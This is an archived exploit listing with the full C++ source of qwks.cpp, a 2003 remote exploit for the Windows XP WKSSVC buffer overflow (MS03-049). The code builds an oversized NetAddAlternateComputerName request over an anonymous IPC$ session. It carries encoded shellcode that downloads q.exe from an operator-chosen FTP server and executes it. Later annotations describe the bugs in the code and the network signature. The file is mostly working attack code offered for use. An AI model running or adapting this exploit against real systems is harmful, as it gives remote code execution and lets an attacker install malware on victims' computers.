
qwks.cpp

Posted Dec 5, 2003
Authored by qaaz

Microsoft Windows WKSSVC remote exploit written in C++. Upon successful exploitation, it downloads a binary via a remote ftp server and executes it.

tags | exploit, remote
systems | windows
SHA-256 | caa8fbce706837771cc1e25c2c20256ebb2cb17f6eb889669a511c48e355037f

/* MS03-049
* windows wkssvc remote exploit by qaaz@centrum.cz. Nov 2003
* private until Dec 2003
*
* uses NetAddAlternateComputerName netapi function and thus
* - it is not limited to FAT32 filesystems
* - it is limited to XPs
*
* uses ninja shellcode decryptor by creed@pi.nxs.se with first
* four bytes modified by me.
*
* internal shellcode is not size optimized, but who cares about
* it - there is a lot of space on the stack. it downloads q.exe
* from a specified ftp server and executes it.
*
* this is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission
* to do so.
*
* have fun
* (and don't leave q.exe in windows system32 directory ;))
*/

#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#pragma comment(lib, "mpr.lib")

//////////////////////////////////////////////////////////////////

/* Decoder stub that main() copies in front of the ninja_encode() output
 * (file header: creed's "ninja" decryptor with its first four bytes changed).
 * Every byte lies in the printable range 0x30..0x7a and the array contains
 * no embedded NUL, which matters because main() measures it with strlen()
 * before the memcpy(). Not disassembled or verified here. */
char ninja_header[] =
"\x54\x41\x41\x41\x5a\x52\x59\x68\x40\x40\x40\x40\x58\x50\x30\x62"
"\x4d\x30\x62\x4e\x30\x62\x6e\x40\x40\x40\x40\x30\x42\x4a\x40\x30"
"\x42\x50\x30\x42\x51\x58\x35\x40\x40\x40\x40\x48\x30\x62\x50\x30"
"\x62\x51\x30\x62\x75\x68\x40\x40\x40\x40\x58\x35\x40\x40\x40\x40"
"\x30\x42\x76\x32\x42\x76\x30\x62\x76\x42\x78\x58\x74\x68\x6c\x40"
"\x7a\x7a\x44\x32\x41\x76\x30\x41\x76\x68\x40\x40\x40\x40\x58\x35"
"\x40\x40\x40\x40\x30\x42\x76\x32\x42\x76\x30\x42\x76\x42\x6c\x40"
"\x30\x41\x76\x41\x75\x40";

/* Built-in payload used when no -c file is given. Two placeholders are
 * patched by main() before sending: the 4 bytes "IMGB" (overwritten with
 * TARGET.imagebase) and the 15 bytes "FTP.FTP.FTP.FTP" (overwritten with the
 * -f server string). The tail is a run of NUL-terminated ASCII strings that
 * can be read straight from the hex: "KERNEL32.DLL", "WININET.DLL",
 * "InternetOpenA", "InternetConnectA", "FtpGetFileA", "WinExec",
 * "ExitThread", "FTP.FTP.FTP.FTP", "q.exe"; 4-byte immediates spelling
 * "Load"/"Libr"/"aryA" and "GetP"/"rocA" also appear near the start.
 * Detection note: these cleartext names are a usable static signature only
 * for the raw form — after ninja_encode() every byte is expanded to two
 * characters in 0x40..0x4f, so the strings are no longer present verbatim.
 * main() sends sizeof(qaazcode) bytes, i.e. including the array's trailing
 * NUL. The instruction bytes themselves are not annotated here. */
char qaazcode[] =
"\xe9\x3d\x01\x00\x00\x5d\x8b\x5d\x00\x89\xd8\x83\xc0\x3c\x8b\x00"
"\x01\xd8\x05\x80\x00\x00\x00\x8b\x10\x01\xda\x8b\x02\x01\xd8\x89"
"\x45\x04\x83\xc2\x10\x8b\x02\x01\xd8\x89\x45\x08\x31\xc9\x31\xd2"
"\x8b\x45\x04\x01\xc8\x8b\x00\x01\xd8\x83\xc0\x02\x89\xc6\x8b\x45"
"\x08\x01\xc8\x8b\x00\x81\x3e\x4c\x6f\x61\x64\x75\x18\x81\x7e\x04"
"\x4c\x69\x62\x72\x75\x0f\x81\x7e\x08\x61\x72\x79\x41\x75\x06\x89"
"\x45\x1c\x42\xeb\x15\x81\x3e\x47\x65\x74\x50\x75\x0d\x81\x7e\x04"
"\x72\x6f\x63\x41\x75\x04\x89\x45\x20\x42\x83\xc1\x04\x83\xfa\x02"
"\x75\xae\x8b\x75\x1c\x8b\x7d\x20\x89\xe8\x83\xc0\x38\x50\xff\xd6"
"\x89\x45\x0c\x89\xe8\x83\xc0\x7c\x50\xff\x75\x0c\xff\xd7\x89\x45"
"\x30\x89\xe8\x05\x84\x00\x00\x00\x50\xff\x75\x0c\xff\xd7\x89\x45"
"\x34\x89\xe8\x83\xc0\x45\x50\xff\xd6\x89\x45\x10\x89\xe8\x83\xc0"
"\x51\x50\xff\x75\x10\xff\xd7\x89\x45\x24\x89\xe8\x83\xc0\x5f\x50"
"\xff\x75\x10\xff\xd7\x89\x45\x28\x89\xe8\x83\xc0\x70\x50\xff\x75"
"\x10\xff\xd7\x89\x45\x2c\x31\xdb\x53\x53\x53\x68\x01\x00\x00\x00"
"\x53\xff\x55\x24\x89\x45\x14\x53\x53\x68\x01\x00\x00\x00\x53\x53"
"\x68\x15\x00\x00\x00\x89\xe8\x05\x8f\x00\x00\x00\x50\xff\x75\x14"
"\xff\x55\x28\x89\x45\x18\x53\x68\x02\x00\x00\x00\x68\x80\x00\x00"
"\x00\x53\x89\xe8\x05\x9f\x00\x00\x00\x50\x50\xff\x75\x18\xff\x55"
"\x2c\x53\x89\xe8\x05\x9f\x00\x00\x00\x50\xff\x55\x30\x53\xff\x55"
"\x34\xc3\xe8\xbe\xfe\xff\xff\x49\x4d\x47\x42\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4b"
"\x45\x52\x4e\x45\x4c\x33\x32\x2e\x44\x4c\x4c\x00\x57\x49\x4e\x49"
"\x4e\x45\x54\x2e\x44\x4c\x4c\x00\x49\x6e\x74\x65\x72\x6e\x65\x74"
"\x4f\x70\x65\x6e\x41\x00\x49\x6e\x74\x65\x72\x6e\x65\x74\x43\x6f"
"\x6e\x6e\x65\x63\x74\x41\x00\x46\x74\x70\x47\x65\x74\x46\x69\x6c"
"\x65\x41\x00\x57\x69\x6e\x45\x78\x65\x63\x00\x45\x78\x69\x74\x54"
"\x68\x72\x65\x61\x64\x00\x46\x54\x50\x2e\x46\x54\x50\x2e\x46\x54"
"\x50\x2e\x46\x54\x50\x00\x71\x2e\x65\x78\x65\x00";

/* One target profile. Every numeric field can be overridden from the
 * command line in main() (-i, -p, -r, -l), starting from targets[-t]. */
typedef struct tagTARGET {
char *title;              /* label printed by usage() */
unsigned long imagebase;  /* 4-byte value main() writes over the "IMGB" marker in the built-in payload */
int padlen;               /* number of filler bytes placed before retaddr in the name buffer */
unsigned long retaddr;    /* 4-byte value stored at abuff + padlen */
int retlen;               /* number of filler bytes placed after retaddr, before the payload */
BOOL ninja;               /* never read: main() uses its own local 'ninja' flag (cleared by -noninja) */
} TARGET;

/* Target table, indexed by the -t option (0-based). Positional initialiser
 * in TARGET field order: title, imagebase, padlen, retaddr, retlen, ninja.
 * Only one entry exists; main()'s -t range check compares the index against
 * sizeof(targets) in bytes rather than the element count. */
TARGET targets[] = {
{ "Windows XP Pro, SP1", 0x75140000, 2044, 0x77da33a0, 0x10, TRUE }
};

//////////////////////////////////////////////////////////////////

/* Function-pointer type under which NetAddAlternateComputerName is called.
 * The parameters are declared as char* even though main() passes UTF-16
 * buffers (wname/wbuff) cast to char*; the real netapi32 export takes wide
 * strings, so the casts only paper over the mismatch — the bytes reaching
 * the callee are the UTF-16 data. */
typedef int (WINAPI * ADDALTCN) (char*, char*, void*, void*, long);

HINSTANCE hNetApi;          /* module handle from LoadLibrary(szNetApi); released by FreeLibrary() in main() */
ADDALTCN fnNetAdd = NULL;   /* resolved at run time with GetProcAddress(hNetApi, szNetAdd) */

char szNetApi[] = "netapi32.dll";               /* library that exports the call */
char szNetAdd[] = "NetAddAlternateComputerName"; /* export resolved by name, not linked */

//////////////////////////////////////////////////////////////////

/* Write the three-line tool banner (followed by a blank line) to stdout. */
void banner()
{
	static const char *const lines[] = {
		"===============================================\n",
		"windows wkssvc remote exploit by qaaz. Nov 2003\n",
		"===============================================\n\n",
	};

	for (size_t k = 0; k < sizeof lines / sizeof lines[0]; k++)
		fputs(lines[k], stdout);
}

/* Print command-line help: the option summary followed by the numbered list
 * of entries in targets[]. prog is the program name to show (argv[0]). */
void usage(char* prog)
{
	static const char options[] =
		"\t-h:hostname\n"
		"\t-t:target\n"
		"\t-p:padlen\n"
		"\t-r:retaddr\n"
		"\t-l:retlen\n"
		"\t-c:codefile\n"
		"\t-f:ftpserver\n"
		"\t-i:imagebase\n"
		"\t-attack\n"
		"\t-noninja\n"
		"\n";
	const size_t ntargets = sizeof(targets) / sizeof(TARGET);

	fputs("usage:\n", stdout);
	printf("%s <opt>:<optarg>\n", prog);
	fputs(options, stdout);

	fputs("targets:\n", stdout);
	for (size_t k = 0; k < ntargets; k++)
		printf("\t%d: %s\n", (int)k, targets[k].title);
}

/* Append a printable expansion of len bytes from in to out: each input byte
 * becomes two characters, 0x40 + high nibble then 0x40 + low nibble (so only
 * 0x40..0x4f are produced), and a single 'X' is appended after the last
 * byte. Output is accumulated with strcat(), so out must already be a
 * NUL-terminated string (main() zero-fills it first) with room for
 * 2*len + 2 more bytes — nothing here checks that bound. 'in' is plain
 * char, so bytes >= 0x80 take a signed right shift before the mask; the
 * & 0xf keeps the result in range. main() places the ninja_header stub in
 * front of this output. */
void ninja_encode(char* in, char* out, int len)
{
char temp[3];   /* two output characters plus the NUL sprintf() writes */

for (int i = 0; i < len; i++)
{
sprintf(temp, "%c%c", ((*in>>4)&0xf)+0x40, (*in&0xf)+0x40);
strcat(out, temp);   /* rescans out every iteration: O(len^2) overall */
in++;
}
strcat(out, "X");   /* trailing marker after the encoded bytes */
}

//////////////////////////////////////////////////////////////////

/* Entry point. Parses the command line, opens an anonymous session to
 * \\host\ipc$, resolves NetAddAlternateComputerName from netapi32.dll and
 * calls it with an oversized "alternate name" built from the selected TARGET
 * (or the literal "[null]" when -attack is absent, which only exercises the
 * call path). Returns 1 on any usage/setup failure, 0 otherwise; the remote
 * status is printed but not interpreted.
 * What a defender sees on the wire: an IPC$ connection with empty user name
 * and password, immediately followed by a wkssvc NetAddAlternateComputerName
 * request whose name argument is several KiB long. */
int main(int argc, char* argv[])
{
int stat, i;
char opt, *optarg, *pchar;

TARGET target = targets[0];   /* default profile; individual fields overridden by -p/-r/-l/-i */
BOOL attack = FALSE, ninja = TRUE;   /* this local 'ninja' is the one consulted; TARGET.ninja is never read */
char *hostname = NULL, *codefile = NULL, *ftpserv = NULL;

char ipc[1024];          /* "\\host\ipc$" for WNetAddConnection2/WNetCancelConnection2 */
char aname[1 * 1024];    /* ANSI server name "\\host" */
char wname[2 * 1024];    /* UTF-16 copy of aname, sized in bytes */
char abuff[10 * 1024];   /* ANSI "alternate name" argument */
char wbuff[20 * 1024];   /* UTF-16 copy of abuff, sized in bytes */

banner();

if (argc == 1)
{
usage(argv[0]);
return 1;
}

/* Option syntax is "-x:value" with the colon part of the option name;
 * the bare "-attack"/"-noninja" forms get optarg = "". Any unrecognised
 * argument prints usage and exits, so 'opt' is always set before the
 * switch. */
for (i = 1; i < argc; i++)
{
if (!strncmp(argv[i], "-h:", 3)) opt = 'h';
else if (!strncmp(argv[i], "-t:", 3)) opt = 't';
else if (!strncmp(argv[i], "-p:", 3)) opt = 'p';
else if (!strncmp(argv[i], "-r:", 3)) opt = 'r';
else if (!strncmp(argv[i], "-l:", 3)) opt = 'l';
else if (!strncmp(argv[i], "-c:", 3)) opt = 'c';
else if (!strncmp(argv[i], "-f:", 3)) opt = 'f';
else if (!strncmp(argv[i], "-i:", 3)) opt = 'i';
else if (!strcmp(argv[i], "-attack")) opt = 'a';
else if (!strcmp(argv[i], "-noninja")) opt = 'n';
else {
usage(argv[0]);
return 1;
}

if (argv[i][2] == ':')
optarg = argv[i] + 3;
else
optarg = "";

switch (opt)
{
case 'h':
hostname = optarg;
break;
case 't':
/* BUG: the upper bound is sizeof(targets) in bytes, not the element
 * count, and uses > rather than >=, so an index past the one-entry
 * table is accepted and reads beyond the array. atoi() also maps
 * non-numeric input to 0 silently. */
if (atoi(optarg) < 0 || atoi(optarg) > sizeof(targets))
return 1;
target = targets[atoi(optarg)];
break;
case 'p':
target.padlen = atoi(optarg);
break;
case 'r':
sscanf(optarg, "%lx", &target.retaddr);   /* hex; unparseable input leaves the field unchanged (return value unchecked) */
break;
case 'l':
target.retlen = atoi(optarg);
break;
case 'c':
codefile = optarg;
break;
case 'f':
ftpserv = optarg;
break;
case 'i':
sscanf(optarg, "%lx", &target.imagebase);   /* hex, same caveat as -r */
break;
case 'a':
attack = TRUE;
break;
case 'n':
ninja = FALSE;
break;
}
}

/* hostname is never validated: without -h it is still NULL here, and
 * passing NULL to "%s" is undefined behaviour (some CRTs print "(null)",
 * others crash). */
sprintf(ipc, "\\\\%s\\ipc$", hostname);
sprintf(aname, "\\\\%s", hostname);
memset(wname, 0, sizeof(wname));
memset(abuff, 0, sizeof(abuff));
memset(wbuff, 0, sizeof(wbuff));

/* netapi32 is loaded and the export looked up at run time rather than
 * linked, so a missing export is reported here instead of at load time. */
printf("[+] loading '%s' library...\n", szNetApi);
hNetApi = LoadLibrary(szNetApi);
if (hNetApi == NULL)
{
printf("[-] '%s' not loaded\n", szNetApi);
return 1;
}
printf("[+] loaded at %p\n", hNetApi);

printf("[+] locating '%s' function...\n", szNetAdd);
fnNetAdd = (ADDALTCN) GetProcAddress(hNetApi, szNetAdd);
if (fnNetAdd == NULL)
{
printf("[-] '%s' not found\n", szNetAdd);
return 1;
}
printf("[+] located at %p\n", fnNetAdd);

/* NETRESOURCE is only partially initialised: dwScope, dwDisplayType,
 * dwUsage and lpComment keep whatever was on the stack. The connection is
 * made with an empty password and empty user name, i.e. an anonymous
 * (null) session to IPC$ — the first artefact a network sensor sees. */
printf("[+] connecting to '%s'...\n", hostname);
NETRESOURCE nr;
nr.lpLocalName = NULL;
nr.lpProvider = NULL;
nr.dwType = RESOURCETYPE_ANY;
nr.lpRemoteName = ipc;
stat = WNetAddConnection2(&nr, "", "", 0);
if (stat != 0)
{
printf("[-] WNetAddConnection2 failed\n");
return 1;
}
printf("[+] connected\n");

if (attack)
{
int slen = 0;            /* number of payload bytes held in scode */
char scode[1 * 1024];    /* raw payload; the fread() below is capped at this size */

memset(scode, 0, sizeof(scode));

if (codefile)
{
FILE *fcode;

printf("[+] loading '%s' shellcode...\n", codefile);
if (!(fcode = fopen(codefile, "r")))
{
printf("[-] fopen failed\n");
return 1;
}
slen = fread(scode, 1, sizeof(scode), fcode);
fclose(fcode);
printf("[+] loaded %d B of shellcode\n", slen);
}
else
{
slen = sizeof(qaazcode);   /* includes the array's trailing NUL */
memcpy(scode, qaazcode, slen);

/* Patch the two placeholders in the built-in payload: "IMGB" gets the
 * 4-byte imagebase, "FTP.FTP.FTP.FTP" gets the -f string. ftpserv is
 * not checked for NULL (no -f means a crash here) and the strcpy() is
 * unbounded. */
for (i = 0; i < (slen - 15); i++)
{
pchar = scode + i;
if (!strncmp(pchar, "IMGB", 4))
*(unsigned long *)pchar = target.imagebase;
if (!strncmp(pchar, "FTP.FTP.FTP.FTP", 15))
strcpy(pchar, ftpserv);
}
}

/* Layout of abuff: padlen filler bytes, the 4-byte retaddr, retlen more
 * filler, then the payload. abuff was zero-filled above and is later
 * measured with strlen(), so conversion stops at the first NUL. */
memset(abuff, 'A', target.padlen + 4);
pchar = abuff + target.padlen;
*(unsigned long *)pchar = target.retaddr;   /* possibly unaligned 4-byte store */
pchar += 4;
memset(pchar, 'A', target.retlen);
pchar += target.retlen;

if (ninja)
{
char ncode[2 * 1024];   /* ninja_encode() needs 2*slen + 2 bytes; slen == sizeof(scode) would overrun this */

memset(ncode, 0, sizeof(ncode));   /* ninja_encode() appends with strcat(), so out must start empty */
ninja_encode(scode, ncode, slen);
memcpy(pchar, ninja_header, strlen(ninja_header));   /* decoder stub first */
pchar += strlen(ninja_header);
memcpy(pchar, ncode, (slen * 2) + 1);   /* then 2*slen encoded chars plus the trailing 'X' */
}
else
{
memcpy(pchar, scode, slen);   /* raw payload, no encoding */
}
}
else
{
strcpy(abuff, "[null]");   /* no -attack: a short, harmless name — effectively a connectivity/API probe */
}

/* Both strings are converted including their terminating NUL (strlen()+1).
 * NOTE(review): the cchWideChar argument is sizeof() in bytes, i.e. twice
 * the real WCHAR capacity of wname/wbuff; it does not overflow only because
 * the ANSI sources (aname 1 KiB, abuff 10 KiB) are at most half the size of
 * their wide counterparts. */
printf("[+] converting ansi strings to unicode\n");
MultiByteToWideChar(CP_ACP, 0, aname, strlen(aname) + 1, (WCHAR *)wname, sizeof(wname) / sizeof(wname[0]));
MultiByteToWideChar(CP_ACP, 0, abuff, strlen(abuff) + 1, (WCHAR *)wbuff, sizeof(wbuff) / sizeof(wbuff[0]));

/* This is the call that reaches the remote service; the char* casts match
 * the loosely typed ADDALTCN prototype, the data is UTF-16. */
printf("[+] sending query...\n");
stat = fnNetAdd((char *)wname, (char *)wbuff, NULL, NULL, 0);
printf("[+] sent (status: %d)\n", stat);

printf("[+] disconnecting\n");
WNetCancelConnection2(ipc, 0, TRUE);   /* force-close the IPC$ session */
FreeLibrary(hNetApi);

printf("[.] that's all folks\n");
return 0;
}